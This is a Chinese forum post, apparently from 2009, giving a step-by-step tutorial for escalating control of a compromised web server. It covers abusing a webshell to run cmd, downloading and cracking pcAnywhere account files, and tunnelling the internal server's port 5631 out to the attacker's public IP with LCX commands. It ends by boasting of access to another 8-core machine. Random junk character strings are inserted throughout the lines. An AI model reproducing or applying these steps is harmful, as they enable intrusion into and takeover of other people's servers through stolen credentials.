|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。( i, B! B9 g' b! \
& y* O f6 ]7 Z* q! }提权方法:pcanywhere+LCX$ |8 O" N4 H6 @$ Q! |2 Q% V
0 m4 U+ w$ q8 O0 m; q3 \! l获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。 N+ M: j3 t+ q: H" t
' F! j2 x* Y8 D& j+ r2 ~在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。& c" ?* Z! k: y& S
8 j& T) {& I7 @. k
4 o4 g0 Z4 c! f" g4 y5 d2 x查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。# r4 j! F/ ?. d9 g2 R) |2 ?$ Z6 ]
7 A& U1 L) g' _5 x! L8 G! E g1 ~
; @; p! i( T: E5 P) I- h呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
S3 ]4 n# q; n, h* V7 F+ P
+ V" [: @7 |! Q. r/ a/ @7 T& ]( {7 G8 { X2 D3 ]
7 Y+ _0 e% ~3 i" \& ?- V
2 d. a" h6 _. h' F7 m1 E
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
# K- K5 y9 ~& R2 H6 C6 I# @5 ]; b: S
3 G& E/ j& ?# I; }- x: D% ILCX的用法再简单说下:4 I8 [) A7 w: p3 D( p+ R. B
' h8 x! O' B3 ^ q
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)0 r, o0 w8 E* P$ }4 F
5 x: C5 F; v( c% d% t本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
. a) n5 k4 G1 L# x! q- D8 O# o% i. b& [8 L4 |
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。$ ^6 L1 R; M* ^ p8 z- \( m
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
O$ f% O$ U/ g% m7 B
) E9 e, c, H" V( _! N g) j2 N
( J7 L# t3 V6 h% }5 h) L. R( G
+ v1 _* A' }) D' f# b+ a* ~8 P呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
. Z5 W. i- ~6 B! ^) P4 P- j) _0 d" N) b& ?0 C2 Z }& `) N
( t$ P3 x1 q' [) t
8 P* [2 s6 P$ R* d/ s" I+ U
" \5 Q( v: g7 N+ r我们本地连接试试,输入我们刚破解的账号密码- I0 P6 L* E. F% `
8 {; N9 D" x% ?4 [' b x
& E# N1 R0 H+ F& f呵呵``连接成功,服务器不错,又一个8核^︵^# q* r9 F/ i! A5 m& Q
& J) a" W B) p. q# y4 |8 P e
0 z; ^; m- ?/ ]8 y" {) T+ }
6 o. a6 n' {. X4 ~- u! O |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
